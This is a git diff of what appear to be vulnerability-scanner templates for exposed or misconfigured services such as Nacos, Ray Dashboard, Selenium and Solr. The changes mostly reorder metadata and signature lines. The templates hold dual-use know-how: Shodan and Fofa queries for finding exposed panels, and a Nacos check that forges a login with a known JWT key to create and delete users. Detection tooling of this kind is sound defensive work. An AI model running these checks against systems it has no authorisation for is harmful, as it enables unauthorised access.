@@ -8,16 +8,16 @@ info:
Nacos uses a fixed JWT token key to authenticate users in the default configuration. Since Nacos is an open source project, the key is publicly known, so unauthorized attackers can use this fixed key to forge any user identity Log in to Nacos to manage and operate background interface functions.
reference:
- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/nacos-token-create-user.yaml
+ classification:
+ cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
- shodan-query: title:"Nacos"
- product: nacos
vendor: alibaba
+ product: nacos
+ shodan-query: title:"Nacos"
tags: misconfig,nacos,unauth,bypass,instrusive
- classification:
- cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -42,4 +42,5 @@ http:
- "status_code_1 == 200 && contains(body_1,'create user ok!')"
- "status_code_3 == 200 && contains(body_3,'delete user ok!')"
condition: and
-# digest: 490a00463044022035dd3e81460a17dce5f817479772130279b295687fd12cf6a77a263c479abbb40220781474ffa64fc9ac8255b1c830542d9acdd106252296def591965d3ec41aef3b:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a00463044022035dd3e81460a17dce5f817479772130279b295687fd12cf6a77a263c479abbb40220781474ffa64fc9ac8255b1c830542d9acdd106252296def591965d3ec41aef3b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/ntop-panel-exposed.yaml b/http/misconfiguration/ntop-panel-exposed.yaml
index 898f33d038..e10a4a9b81 100644
--- a/http/misconfiguration/ntop-panel-exposed.yaml
+++ b/http/misconfiguration/ntop-panel-exposed.yaml
@@ -4,16 +4,16 @@ info:
name: ntop Network Traffix Exposed
author: tess
severity: unknown
+ classification:
+ cpe: cpe:2.3:a:ntop:ntopng:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Configure ntop"
- product: ntopng
vendor: ntop
+ product: ntopng
+ shodan-query: title:"Configure ntop"
tags: misconfig,ntop,exposure
- classification:
- cpe: cpe:2.3:a:ntop:ntopng:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -37,4 +37,4 @@ http:
status:
- 200
-# digest: 490a0046304402204e3c7c97d0aeff2878966c6afa714c26feaa857831df52fae4d3a7ea7482a6ac022073a51c3f2066b5229aaf04aaa0f0feeaababd0f9d034eec3fdfe41cb3f818fa6:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402204e3c7c97d0aeff2878966c6afa714c26feaa857831df52fae4d3a7ea7482a6ac022073a51c3f2066b5229aaf04aaa0f0feeaababd0f9d034eec3fdfe41cb3f818fa6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/odoo-unprotected-database.yaml b/http/misconfiguration/odoo-unprotected-database.yaml
index 4e1cedde65..e0185a00d2 100644
--- a/http/misconfiguration/odoo-unprotected-database.yaml
+++ b/http/misconfiguration/odoo-unprotected-database.yaml
@@ -8,16 +8,16 @@ info:
The system has an Odoo application whose database manager is unprotected, indicating potential unauthorized access.
remediation: |
Implement and enforce proper authentication and access control measures to protect the Odoo database manager.
+ classification:
+ cpe: cpe:2.3:a:odoo:odoo:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Odoo"
- product: odoo
vendor: odoo
+ product: odoo
+ shodan-query: title:"Odoo"
tags: odoo,database,unauth,misconfig
- classification:
- cpe: cpe:2.3:a:odoo:odoo:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -33,4 +33,4 @@ http:
status:
- 200
-# digest: 490a00463044022077bae65be56d0b9e92250e39058f9422f8263d55f5e2764bf87c25263e5d08f002202240a1ef4c069648261141c66f4a3607444e6b9abde00a45e15cca7efd1f1f09:922c64590222798bb761d5b6d8e72950
+# digest: 490a00463044022077bae65be56d0b9e92250e39058f9422f8263d55f5e2764bf87c25263e5d08f002202240a1ef4c069648261141c66f4a3607444e6b9abde00a45e15cca7efd1f1f09:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/openstack-config.yaml b/http/misconfiguration/openstack-config.yaml
index 4f24f1ae93..fabbb7f9ef 100644
--- a/http/misconfiguration/openstack-config.yaml
+++ b/http/misconfiguration/openstack-config.yaml
@@ -8,15 +8,15 @@ info:
Openstack exposing Configuration or settings related to the Swift object storage system.
reference:
- https://docs.openstack.org/python-cloudkittyclient/stein/api_reference/info.html
- metadata:
- max-request: 2
- shodan-query: http.favicon.hash:786533217
- product: swift
- vendor: openstack
- tags: exposure,misconfig,openstack
-
classification:
cpe: cpe:2.3:a:openstack:swift:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 2
+ vendor: openstack
+ product: swift
+ shodan-query: http.favicon.hash:786533217
+ tags: exposure,misconfig,openstack
+
http:
- method: GET
path:
@@ -42,4 +42,4 @@ http:
status:
- 200
-# digest: 4b0a00483046022100c504ae86098c92cdf1075b41054fd034ae21ecebd6d3aba49a10adb53a4c2356022100915148716537ac9841a78f79df37fb16c699ac1852fec8448ebb9746215f4d40:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100c504ae86098c92cdf1075b41054fd034ae21ecebd6d3aba49a10adb53a4c2356022100915148716537ac9841a78f79df37fb16c699ac1852fec8448ebb9746215f4d40:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/oracle-reports-services.yaml b/http/misconfiguration/oracle-reports-services.yaml
index fb5c8546ba..22121329cd 100644
--- a/http/misconfiguration/oracle-reports-services.yaml
+++ b/http/misconfiguration/oracle-reports-services.yaml
@@ -5,16 +5,16 @@ info:
author: dogasantos
severity: info
description: Oracle Reports Services - Servlet Command dashboard
+ classification:
+ cpe: cpe:2.3:a:oracle:reports:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
- shodan-query: title:"Oracle Forms"
- product: reports
vendor: oracle
+ product: reports
+ shodan-query: title:"Oracle Forms"
tags: exposure,oracle,misconfig
- classification:
- cpe: cpe:2.3:a:oracle:reports:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -43,4 +43,4 @@ http:
status:
- 200
-# digest: 4a0a004730450220425d76c5277ab13703b75fa7f5d7d2b934e5d315ee27c61c3fdc27e57c28503802210094750ba826f32b994a2cb5bf6c45bbfd2beee643611fda120a68e6da43857ff0:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a004730450220425d76c5277ab13703b75fa7f5d7d2b934e5d315ee27c61c3fdc27e57c28503802210094750ba826f32b994a2cb5bf6c45bbfd2beee643611fda120a68e6da43857ff0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/pcdn-cache-node.yaml b/http/misconfiguration/pcdn-cache-node.yaml
index d69978869c..7c32b74305 100644
--- a/http/misconfiguration/pcdn-cache-node.yaml
+++ b/http/misconfiguration/pcdn-cache-node.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDk
severity: low
description: PCDN Cache Node dataset is exposed.
+ classification:
+ cpe: cpe:2.3:a:cache-base_project:cache-base:*:*:*:*:node.js:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"PCDN Cache Node Dataset"
- product: cache-base
vendor: cache-base_project
+ product: cache-base
+ shodan-query: title:"PCDN Cache Node Dataset"
tags: node,pcdn,misconfig
- classification:
- cpe: cpe:2.3:a:cache-base_project:cache-base:*:*:*:*:node.js:*:*:*
http:
- method: GET
path:
@@ -38,4 +38,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a0048304602210089f5532f1677cb86d4d15b412b49ce9126c8f530843b4748c20af7699ea527cb022100d62f108e4c61aa3ffc432f1b1aa3d991ca17ea9c45850a324fea02d5c52ea70c:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a0048304602210089f5532f1677cb86d4d15b412b49ce9126c8f530843b4748c20af7699ea527cb022100d62f108e4c61aa3ffc432f1b1aa3d991ca17ea9c45850a324fea02d5c52ea70c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/perfsonar-toolkit.yaml b/http/misconfiguration/perfsonar-toolkit.yaml
index 86e8d4916c..70484b6e8c 100644
--- a/http/misconfiguration/perfsonar-toolkit.yaml
+++ b/http/misconfiguration/perfsonar-toolkit.yaml
@@ -7,16 +7,16 @@ info:
description: perfSONAR Toolkit is exposed.
reference:
- https://www.facebook.com/photo?fbid=619180260252497&set=pcb.619180283585828
+ classification:
+ cpe: cpe:2.3:a:perfsonar:perfsonar:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"perfSONAR"
- product: perfsonar
vendor: perfsonar
+ product: perfsonar
+ shodan-query: title:"perfSONAR"
tags: misconfig,perfsonar,toolkit
- classification:
- cpe: cpe:2.3:a:perfsonar:perfsonar:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -35,4 +35,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502205d1e491aa0d5d2691a5a61f3ee04489df76010f8a4e4b338ae6593982bf98e84022100d6ef3d360ca57ca19041b6dcf456214dea2cc17ac405d64fdce12a0f4a12ce2b:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502205d1e491aa0d5d2691a5a61f3ee04489df76010f8a4e4b338ae6593982bf98e84022100d6ef3d360ca57ca19041b6dcf456214dea2cc17ac405d64fdce12a0f4a12ce2b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/php-errors.yaml b/http/misconfiguration/php-errors.yaml
index 20931178f5..7453fe0b7d 100644
--- a/http/misconfiguration/php-errors.yaml
+++ b/http/misconfiguration/php-errors.yaml
@@ -4,15 +4,15 @@ info:
name: PHP errors
author: w4cky_,geeknik,dhiyaneshDK
severity: info
- metadata:
- max-request: 1
- shodan-query: http.title:"PHP warning" || "Fatal error"
- product: php
- vendor: php
- tags: debug,php,misconfig
-
classification:
cpe: cpe:2.3:a:php:php:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: php
+ product: php
+ shodan-query: http.title:"PHP warning" || "Fatal error"
+ tags: debug,php,misconfig
+
http:
- method: GET
path:
@@ -48,4 +48,4 @@ http:
- '(?i)Allowed Memory Size of \d* Bytes Exhausted'
- '(?i)Maximum execution time of \d* seconds exceeded'
-# digest: 4a0a004730450220253c9cfefeec7f15310fe83d714b5ca6145b0a01cf27947bebe4b9de25acdf4e022100b95ea3ebd9a8458311947ef44210a5752d427f1f37e68bdf5dd996655e909702:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a004730450220253c9cfefeec7f15310fe83d714b5ca6145b0a01cf27947bebe4b9de25acdf4e022100b95ea3ebd9a8458311947ef44210a5752d427f1f37e68bdf5dd996655e909702:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/phpcli-stack-trace.yaml b/http/misconfiguration/phpcli-stack-trace.yaml
index 94a7292201..4d9a29f640 100644
--- a/http/misconfiguration/phpcli-stack-trace.yaml
+++ b/http/misconfiguration/phpcli-stack-trace.yaml
@@ -4,16 +4,16 @@ info:
name: PHP CLI Server Stack Trace
author: DhiyaneshDk
severity: info
+ classification:
+ cpe: cpe:2.3:a:php:php:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: The requested resource
- product: php
vendor: php
+ product: php
+ shodan-query: The requested resource
tags: misconfig,phpcli,intrusive
- classification:
- cpe: cpe:2.3:a:php:php:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -38,4 +38,4 @@ http:
status:
- 404
-# digest: 490a004630440220562317d603c300e4d51bc22217a0758d3c43add49d3e2b342225826297c42be80220320994e9a1cd0b2cd620df74974b888e95118329cfd61f0de1d8952bc594d5a0:922c64590222798bb761d5b6d8e72950
+# digest: 490a004630440220562317d603c300e4d51bc22217a0758d3c43add49d3e2b342225826297c42be80220320994e9a1cd0b2cd620df74974b888e95118329cfd61f0de1d8952bc594d5a0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/python-metrics.yaml b/http/misconfiguration/python-metrics.yaml
index 0176222859..baacccca7c 100644
--- a/http/misconfiguration/python-metrics.yaml
+++ b/http/misconfiguration/python-metrics.yaml
@@ -7,15 +7,15 @@ info:
description: Information Disclosure of Garbage Collection
reference:
- https://gist.github.com/ruanbekker/e5b1e7895f62b020ff29b5f40767190c
- metadata:
- max-request: 1
- shodan-query: html:"python_gc_objects_collected_total"
- product: python
- vendor: python
- tags: exposure,devops,python,misconfig
-
classification:
cpe: cpe:2.3:a:python:python:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: python
+ product: python
+ shodan-query: html:"python_gc_objects_collected_total"
+ tags: exposure,devops,python,misconfig
+
http:
- method: GET
path:
@@ -34,4 +34,4 @@ http:
status:
- 200
-# digest: 490a0046304402201c1902602bdf71d979bcc3407a11f2ed8f2e8672d4f5a16ba64f671d58c4085c022073e68a2bbd9673eff79de34d84b86a7942b2e35cf5a8e9ba9d50a42a1d6a308d:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402201c1902602bdf71d979bcc3407a11f2ed8f2e8672d4f5a16ba64f671d58c4085c022073e68a2bbd9673eff79de34d84b86a7942b2e35cf5a8e9ba9d50a42a1d6a308d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/rabbitmq-exporter-metrics.yaml b/http/misconfiguration/rabbitmq-exporter-metrics.yaml
index b562edef53..e21c534a92 100644
--- a/http/misconfiguration/rabbitmq-exporter-metrics.yaml
+++ b/http/misconfiguration/rabbitmq-exporter-metrics.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDk
severity: low
description: RabbitMQ Exporter is exposed.
+ classification:
+ cpe: cpe:2.3:a:vmware:rabbitmq:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"RabbitMQ Exporter"
- product: rabbitmq
vendor: vmware
+ product: rabbitmq
+ shodan-query: title:"RabbitMQ Exporter"
tags: rabbitmq,exposure,debug,misconfig
- classification:
- cpe: cpe:2.3:a:vmware:rabbitmq:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -32,4 +32,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a004830460221008c9936da1018e9ceae9c551480ce1910a77cf9523b75cb3a00d71b630d7eec7d022100bf3adcc40ff775fb1e9ee78411e46ad8f08010088cba430ba87958e4b7d8d801:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a004830460221008c9936da1018e9ceae9c551480ce1910a77cf9523b75cb3a00d71b630d7eec7d022100bf3adcc40ff775fb1e9ee78411e46ad8f08010088cba430ba87958e4b7d8d801:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/ray-dashboard.yaml b/http/misconfiguration/ray-dashboard.yaml
index 15b36fa00a..1949db8689 100644
--- a/http/misconfiguration/ray-dashboard.yaml
+++ b/http/misconfiguration/ray-dashboard.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDk
severity: critical
description: Ray Dashboard is exposed.
+ classification:
+ cpe: cpe:2.3:a:ray_project:ray:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Ray Dashboard"
- product: ray
vendor: ray_project
+ product: ray
+ shodan-query: title:"Ray Dashboard"
tags: misconfig,exposure,ray
- classification:
- cpe: cpe:2.3:a:ray_project:ray:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -32,4 +32,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100dd33631ae13e692dba3059141a502b0205f85e26f696372ca654d2605f3e912802204c3ffe062784966281bbd6ab1e5ab8f797beef09d5c1765d31ffa3ba0680f7dd:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100dd33631ae13e692dba3059141a502b0205f85e26f696372ca654d2605f3e912802204c3ffe062784966281bbd6ab1e5ab8f797beef09d5c1765d31ffa3ba0680f7dd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/request-baskets-exposure.yaml b/http/misconfiguration/request-baskets-exposure.yaml
index 4cb64b6731..5c39dbd4b9 100644
--- a/http/misconfiguration/request-baskets-exposure.yaml
+++ b/http/misconfiguration/request-baskets-exposure.yaml
@@ -8,16 +8,16 @@ info:
reference:
- https://notes.sjtu.edu.cn/s/MUUhEymt7#
- https://github.com/entr0pie/CVE-2023-27163
+ classification:
+ cpe: cpe:2.3:a:rbaskets:request_baskets:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"request-baskets"
- product: request_baskets
vendor: rbaskets
+ product: request_baskets
+ shodan-query: html:"request-baskets"
tags: misconfig,requests-baskets,exposure
- classification:
- cpe: cpe:2.3:a:rbaskets:request_baskets:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -38,4 +38,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100fa78a210d11be0b983da6d176dd620213458b20c223773dd517f3d50a2170b440221009b8bfc94b1596f0857e78932cdf803bc9efda41d8d0e8a2d2e7f91d238f09865:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100fa78a210d11be0b983da6d176dd620213458b20c223773dd517f3d50a2170b440221009b8bfc94b1596f0857e78932cdf803bc9efda41d8d0e8a2d2e7f91d238f09865:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/selenium-exposure.yaml b/http/misconfiguration/selenium-exposure.yaml
index 3d012fc865..64e88e212a 100644
--- a/http/misconfiguration/selenium-exposure.yaml
+++ b/http/misconfiguration/selenium-exposure.yaml
@@ -9,16 +9,16 @@ info:
reference:
- https://nutcrackerssecurity.github.io/selenium.html
- https://labs.detectify.com/2017/10/06/guest-blog-dont-leave-your-grid-wide-open/
+ classification:
+ cpe: cpe:2.3:a:selenium:selenium:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: "/wd/hub"
- product: selenium
vendor: selenium
+ product: selenium
+ shodan-query: "/wd/hub"
tags: misconfig,selenium,misconfiguration,rce,chromium
- classification:
- cpe: cpe:2.3:a:selenium:selenium:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -38,4 +38,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100e8d01ef950283916ecd4b7a51ca1894c38c202a983e026809017a5aedcb0f24c0221008947d091988dbb5004c534962daef5c3ed109e158800d62db4d3e4d1dbafb7d2:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100e8d01ef950283916ecd4b7a51ca1894c38c202a983e026809017a5aedcb0f24c0221008947d091988dbb5004c534962daef5c3ed109e158800d62db4d3e4d1dbafb7d2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/sentinel-license-monitor.yaml b/http/misconfiguration/sentinel-license-monitor.yaml
index c710705a2d..01d08e0c86 100644
--- a/http/misconfiguration/sentinel-license-monitor.yaml
+++ b/http/misconfiguration/sentinel-license-monitor.yaml
@@ -4,16 +4,16 @@ info:
name: Sentinel License Monitor - Detect
author: DhiyaneshDk
severity: unknown
+ classification:
+ cpe: cpe:2.3:a:trioniclabs:sentinel:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"Sentinel License Monitor"
- product: sentinel
vendor: trioniclabs
+ product: sentinel
+ shodan-query: html:"Sentinel License Monitor"
tags: misconfig,sentinel,license,monitor
- classification:
- cpe: cpe:2.3:a:trioniclabs:sentinel:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -31,4 +31,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100801dfc952bec31796c7202016051fb5d6cd7a31d1582f6bab25138390ec5ef1d022100d474627bbaae6c5ee906b8b63f3a880515ad614c7e6ce992640bd563dc501a22:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100801dfc952bec31796c7202016051fb5d6cd7a31d1582f6bab25138390ec5ef1d022100d474627bbaae6c5ee906b8b63f3a880515ad614c7e6ce992640bd563dc501a22:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/servicenow-widget-misconfig.yaml b/http/misconfiguration/servicenow-widget-misconfig.yaml
index 05a3f8d5db..fc6dc2be01 100644
--- a/http/misconfiguration/servicenow-widget-misconfig.yaml
+++ b/http/misconfiguration/servicenow-widget-misconfig.yaml
@@ -8,16 +8,16 @@ info:
- https://github.com/bsysop/servicenow
- https://twitter.com/ConspiracyProof/status/1713270026046685272
- https://www.enumerated.ie/servicenow-data-exposure
+ classification:
+ cpe: cpe:2.3:a:servicenow:servicenow:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 54
- shodan-query: title:"servicenow"
- product: servicenow
vendor: servicenow
+ product: servicenow
+ shodan-query: title:"servicenow"
tags: servicenow,widget,misconfig
- classification:
- cpe: cpe:2.3:a:servicenow:servicenow:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -86,4 +86,4 @@ http:
regex:
- '"count":([0-9]+),'
-# digest: 4a0a0047304502202a6cd55766986fb7077ff3d1fa0acf790f1e71de0d403bee0981c3ede12711fc0221009919ff8cc46a4bbffbd550f5fe4809866ddd8e33800028982c6a53addd330860:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502202a6cd55766986fb7077ff3d1fa0acf790f1e71de0d403bee0981c3ede12711fc0221009919ff8cc46a4bbffbd550f5fe4809866ddd8e33800028982c6a53addd330860:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/sftpgo-admin-setup.yaml b/http/misconfiguration/sftpgo-admin-setup.yaml
index 4b4733da4f..59a9e993fb 100644
--- a/http/misconfiguration/sftpgo-admin-setup.yaml
+++ b/http/misconfiguration/sftpgo-admin-setup.yaml
@@ -6,16 +6,16 @@ info:
severity: high
description: |
SFTPGo Admin Password setup page has been exposed.
- metadata:
- max-request: 1
- verified: true
- fofa-query: title="SFTPGo - Setup"
- product: sftpgo
- vendor: sftpgo_project
- tags: sftpgo,misconfig,setup
-
classification:
cpe: cpe:2.3:a:sftpgo_project:sftpgo:*:*:*:*:*:*:*:*
+ metadata:
+ verified: true
+ max-request: 1
+ vendor: sftpgo_project
+ product: sftpgo
+ fofa-query: title="SFTPGo - Setup"
+ tags: sftpgo,misconfig,setup
+
http:
- method: GET
path:
@@ -33,4 +33,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100cb184d53545e58eced5b1d9a3e2c9497c33a092937a7d9fc02f246a36ef33df00221008bf8e0a937d58c9fedfd123c2653afaf1700d070072f59dc0cdffc5968f3cf33:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100cb184d53545e58eced5b1d9a3e2c9497c33a092937a7d9fc02f246a36ef33df00221008bf8e0a937d58c9fedfd123c2653afaf1700d070072f59dc0cdffc5968f3cf33:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/smarterstats-setup.yaml b/http/misconfiguration/smarterstats-setup.yaml
index 32ca3f449b..3073cb3183 100644
--- a/http/misconfiguration/smarterstats-setup.yaml
+++ b/http/misconfiguration/smarterstats-setup.yaml
@@ -5,16 +5,16 @@ info:
author: tess
severity: high
description: SmarterStats Setup is exposed.
+ classification:
+ cpe: cpe:2.3:a:smartertools:smarterstats:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Welcome to SmarterStats!"
- product: smarterstats
vendor: smartertools
+ product: smarterstats
+ shodan-query: title:"Welcome to SmarterStats!"
tags: misconfig,smarterstats,exposure
- classification:
- cpe: cpe:2.3:a:smartertools:smarterstats:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -40,4 +40,5 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402206454ce457c8b5ea9dbeb5ca7a4cfce7f32858c87fe5767cbe12fba7911c91604022018baea3ff3e94b9f5670c77b8517bce8030970fa21d98a1eb30be18d2ae1fe55:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a0046304402206454ce457c8b5ea9dbeb5ca7a4cfce7f32858c87fe5767cbe12fba7911c91604022018baea3ff3e94b9f5670c77b8517bce8030970fa21d98a1eb30be18d2ae1fe55:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/smokeping-grapher.yaml b/http/misconfiguration/smokeping-grapher.yaml
index 1963457fa9..96db31b73a 100644
--- a/http/misconfiguration/smokeping-grapher.yaml
+++ b/http/misconfiguration/smokeping-grapher.yaml
@@ -7,16 +7,16 @@ info:
description: SmokePing Latency Page is exposed.
reference:
- https://www.facebook.com/photo/?fbid=620494143454442&set=a.467014098802448
+ classification:
+ cpe: cpe:2.3:a:smokeping:smokeping:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"SmokePing Latency Page for Network Latency Grapher"
- product: smokeping
vendor: smokeping
+ product: smokeping
+ shodan-query: title:"SmokePing Latency Page for Network Latency Grapher"
tags: misconfig,smokeping,latency,grapher
- classification:
- cpe: cpe:2.3:a:smokeping:smokeping:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -32,4 +32,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a0048304602210093977592f924589f38b0d3ce6d54c601887c3757b346a722ef5ce3eaf97bba15022100b554db331a1ef594a70b073a4bd6ea63b6baca597b7df6b1dc8711a9ae9f7e5a:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a0048304602210093977592f924589f38b0d3ce6d54c601887c3757b346a722ef5ce3eaf97bba15022100b554db331a1ef594a70b073a4bd6ea63b6baca597b7df6b1dc8711a9ae9f7e5a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/solr-query-dashboard.yaml b/http/misconfiguration/solr-query-dashboard.yaml
index 6d4e6b9082..fd116fc423 100644
--- a/http/misconfiguration/solr-query-dashboard.yaml
+++ b/http/misconfiguration/solr-query-dashboard.yaml
@@ -7,14 +7,14 @@ info:
description: Solr's admin page was able to be accessed with no authentication requirements in place.
reference:
- https://www.exploit-db.com/ghdb/5856
- metadata:
- max-request: 2
- product: solr
- vendor: apache
- tags: solr,unauth,edb,misconfig
-
classification:
cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 2
+ vendor: apache
+ product: solr
+ tags: solr,unauth,edb,misconfig
+
http:
- method: GET
path:
@@ -31,4 +31,4 @@ http:
status:
- 200
-# digest: 490a00463044022058d163ffc9449248324a57e16ddd712089600f3185d5266b7c78dd2f0b818d39022002d583d8ac54152a37cf356a19700170a74776e4b1da5ea8eb2e1b77a5de949b:922c64590222798bb761d5b6d8e72950
+# digest: 490a00463044022058d163ffc9449248324a57e16ddd712089600f3185d5266b7c78dd2f0b818d39022002d583d8ac54152a37cf356a19700170a74776e4b1da5ea8eb2e1b77a5de949b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/sonarqube-projects-disclosure.yaml b/http/misconfiguration/sonarqube-projects-disclosure.yaml
index 666bbd8565..c10111d2ae 100644
--- a/http/misconfiguration/sonarqube-projects-disclosure.yaml
+++ b/http/misconfiguration/sonarqube-projects-disclosure.yaml
@@ -9,17 +9,17 @@ info:
reference:
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/SonarQube/SonarQube%20search_projects%20%E9%A1%B9%E7%9B%AE%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md
- https://github.com/deletescape/sloot
+ classification:
+ cpe: cpe:2.3:a:sonarsource:sonarqube:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
+ vendor: sonarsource
+ product: sonarqube
shodan-query: title:"Sonarqube"
fofa-query: app="sonarQube-代码管理"
- product: sonarqube
- vendor: sonarsource
tags: sonarqube,exposure,misconfig
- classification:
- cpe: cpe:2.3:a:sonarsource:sonarqube:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -43,4 +43,4 @@ http:
status:
- 200
-# digest: 4a0a00473045022007a5c2766f7648947c60b9d94121e7d4c522fce141ab6513f1e74b4439e5c869022100e6096339fde4571b6d11b0a6aff6f84e658bead95452dcb7bf8e253ecd6f9c3f:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022007a5c2766f7648947c60b9d94121e7d4c522fce141ab6513f1e74b4439e5c869022100e6096339fde4571b6d11b0a6aff6f84e658bead95452dcb7bf8e253ecd6f9c3f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/sql-server-report-viewer.yaml b/http/misconfiguration/sql-server-report-viewer.yaml
index aacd516a5d..cb2ce59b65 100644
--- a/http/misconfiguration/sql-server-report-viewer.yaml
+++ b/http/misconfiguration/sql-server-report-viewer.yaml
@@ -7,16 +7,16 @@ info:
description: SQL Server ReportViewer page exposed.
reference:
- https://learn.microsoft.com/en-us/sql/reporting-services/create-deploy-and-manage-mobile-and-paginated-reports?view=sql-server-ver16
+ classification:
+ cpe: cpe:2.3:a:microsoft:sql_server:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- google-query: inurl:"/Reports/Pages/Folder.aspx"
- product: sql_server
vendor: microsoft
+ product: sql_server
+ google-query: inurl:"/Reports/Pages/Folder.aspx"
tags: misconfig,sql,report,exposure
- classification:
- cpe: cpe:2.3:a:microsoft:sql_server:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -32,4 +32,5 @@ http:
- "status_code_1 == 200 && status_code_2 != 401"
- "contains(body, 'Data Source') && contains(body, 'SQL Server Reporting Services')"
condition: and
